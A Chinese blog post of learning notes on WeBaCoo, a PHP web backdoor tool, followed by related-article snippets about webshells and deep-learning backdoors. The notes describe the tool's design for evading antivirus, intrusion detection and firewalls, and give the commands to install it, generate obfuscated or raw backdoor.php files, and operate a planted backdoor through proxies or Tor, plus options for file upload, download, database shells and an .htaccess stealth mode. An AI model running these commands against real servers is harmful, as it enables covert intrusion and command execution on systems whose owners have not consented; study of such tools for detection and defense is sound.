PHP WeBaCoo后门学习笔记

最新推荐文章于 2023-04-28 17:23:52 发布
最新推荐文章于 2023-04-28 17:23:52 发布
阅读量417 收藏 2
点赞数 1
分类专栏: 技术
原文链接:https://www.colorgg.com
版权

PHP WeBaCoo后门学习笔记 - PHP WeBaCoo backdoor learning notes

  WeBaCoo (Web Backdoor Cookie) 是一款隐蔽的脚本类Web后门工具。设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测)。WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。

安装:

官网:http://sbechtsoudis.com/archiive/webacoo/index.html

kali linux下默认位于:/usr/bin 目录下

使用git安装:git clone git://github.com/anestisb/WeBaCoo.git

 

常见使用方法:

生成模式(后门生成):

1、使用默认配置生成模糊后门代码:

webacoo -g -o backdoor.php #backdoor.php为自定义后门文件名

2、使用exec有效载荷生成混淆后门代码:

webacoo -g -o backdoor.php -f 3  #backdoor.php为自定义后门文件名 3表示exec方法

3、使用popen有效载荷生成原始后门代码:

webacoo -g -o backdoor.php -f 5 -r #backdoor为自定义后门文件名 5表示popen方法

终端模式(后门利用):

1、使用默认配置访问服务器:

webacoo -t -u http://xxx/backdoor.php #-u 后门路径

2、使用“Cookie-name”作为Cookie名称、“TtT”作为分隔符访问服务器:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 与 TtT 为自定义内容

3、使用一般代理:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 与 TtT 为自定义内容 XX替换为相应的ip和端口号

4,使用tor代理:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 与 TtT 为自定义内容

参数解释:

-f FUNCTION :使用PHP系统函数 system、shell_exec、exec、passthru、popen ,按顺序FUNCTION分别为数字1、2、3、4、5

-g:生成后门

-o:指定生成的后门文件名

-u URL:后门路径

-e CMD:单独命令执行模式 需要添加 -t 和 -u参数

-m METHOD:选择HTTP请求方式,默认为GET

-c COOKIE:Cookie的名字,默认为:M-cookie

-d DELIM:指定分隔符 默认为随机

-p PROXY:使用代理

-v LEVEL:打印的详细程度。默认0 无附加信息,1打印HTTP头,2打印HTTP头和数据

-h:显示帮助文件并退出

-update:更新

mysql-cli:MySQL命令行模式

psql-cli:Postgres命令行模式

upload 使用POST上传文件

download:下载文件

stealth:通过.htaccess 处理增加的隐形模块

imherer
关注
专栏目录
后门学习记录
aaaxinxin_的博客
01-22 4016
后门学习记录Webshell释义:Webshell来源:Webshell详述:Shell(计算机壳层)Linux的shell分类:WebshellWebshell分类小马/一句话木马大马上传Webshell的方法归类(1)解析漏洞上传1. iis目录解析漏洞2. 文本解析漏洞3. 文件名解析4. fast-CGI解析漏洞5. apache解析漏洞(2)截断上传(3)后台数据库备份(4)利用数据库语句上传1. mysql数据库into outfield2. 建立新表写入木马3. phpMyadmin 设置错误
【导读】后门学习新基准!BackdoorBench目前已集成了9种攻击方法、12种防御方法、5种分析工具,leaderboard公布了8000组攻防结果!
EasyAIForum的博客
10-27 731
可以明显观察到不少的攻击在浓度提升到一定比例后都会造成防御后的ASR下降,也可以认为这是高浓度的攻击样本带来了较大的干净/投毒样本差异造成的,所以对于后门攻防来说,在低投毒浓度下保持攻击性能/抵御攻击将成为一个重要的方向。此外,遗忘性的评估实验中提供了一个精细的工具来分析每个单独的训练样本的贡献,这可以促进开发更先进的后门攻击和防御方法。首先,如第一列所示,中毒样本的损失函数在训练的早期阶段迅速下降,并收敛到一个低值,而干净样本的损失函数下降速度较慢且最终收敛到了一个更大的值。
浅谈深度学习模型中的后门
XP and Altoria
03-21 3222
关于深度学习安全方面,粗浅地可以分为两大块:对抗样本(Adversarial Example)以及后门(Backdoor) 关于对抗样本可以查看我之前的文章 ----对抗样本攻击 这一次我们主要关注深度学习里面的后门攻击。所谓后门,那就是一个隐藏着的,不轻易就被发现的一个通道。在某些特殊情况下,这个通道就会显露出来。 那么在深度学习之中,后门又是怎样的呢?我这里不妨以图像分类任务作为一个例子,我们手里有一张狗的照片,通过分类器,以99%的置信度(confidence)被分类为狗。如若我在这张图像上添加一个图
Stetman读paper小记:BackdoorBench - A Comprehensive Benchmark of Backdoor Learning
最新发布
Stetman的博客
04-28 524
之前因为参与了实验室后面攻击的项目,阅读了一下这篇关于后门学习的综合性基准测试的研究工作,在此记录一下学习笔记与心得。
三款查找PHP ASP 后门的工具,一款在线的,两款软件版。.zip
09-26
三款查找PHP ASP 后门的工具,一款在线的,两款软件版。
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
PHP后门PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与...
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
后门学习综述》论文发布
11-21
后门学习(backdoor learning)是一个重要且正在蓬勃发展的领域。与对抗学习(adversarial learning)类似,后门学习也研究深度学习模型的安全性问题,其研究主要包括两大领域:后门攻击(backdoor attacks)及后门防御(backdoor defenses)。
webacoowebshell
03-04
webacoowebshell,一个轻量级的phpshell,比较好用
深度学习后门攻防综述
热门推荐
Yale的博客
05-25 1万+
0x00 后门这个词我们在传统软件安全中见得很多了,在Wikipedia上的定义[1]为绕过软件的安全性控制,从比较隐秘的通道获取对程序或系统访问权的黑客方法。在软件开发时,设置后门可以方便修改和测试程序中的缺陷。但如果后门被其他人知道(可以是泄密或者被探测到后门),或是在发布软件之前没有去除后门,那么它就对计算机系统安全造成了威胁。 那么相应地,在深度学习系统中也存在后门这一说法,这一领域由Gu等人2017年发表的BadNets[2]和Liu等人2017年发表的TrojanNN[3]开辟,目前是深度学习
2021/7/24 SVM 2021/7/26 后门学习&对抗神经网络
weixin_55703970的博客
07-26 1237
SVM:support vector machine https://www.bilibili.com/video/BV1Ys411N7jh?p=1 目的:我们是想得到一个超平面最好地分割两类点(e.g.猫或者狗)。问题转换为………… SVM可以通过引入松弛变量给予分错的一些点惩罚函数,(C. Cortes and V. Vapnik. Support Vector Networks. Machine Learning, 1995. 54),使得优化后为: 也可以推广为非平面的分割(B.E...
Web后门工具WeBaCoo
weixin_33701294的博客
09-11 196
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP Learning notes
VMLINUZ的专栏
06-30 797
========June/30========= Chapter 1 1.reigister_globals= off in php.ini and set default value in variables when definition. 2.safe_mode(directive option)= On in php.ini, PHP only limit PHP fil
四种后门技术知识讲解(一)
weixin_34293902的博客
10-10 362
曾经饱受***、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们也不用提心吊胆上网了…… 可是后门会因此罢休吗?答案当然是否定的。君不见,在风平浪静的陆地下,一批新的后门正在暗渡陈仓……  1、反客为主的***者  ***A连接上了网络...
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 972
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCooWeb Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6479
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
PHP无eval后门技巧解析
"这篇文章主要探讨了PHP中无eval的代码执行后门方法,包括assert、create_function、preg_replace以及mb_ereg_replace等函数的使用。虽然PHP 7对某些函数进行了限制,但仍然存在绕过的方式。" 在PHP中,进行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值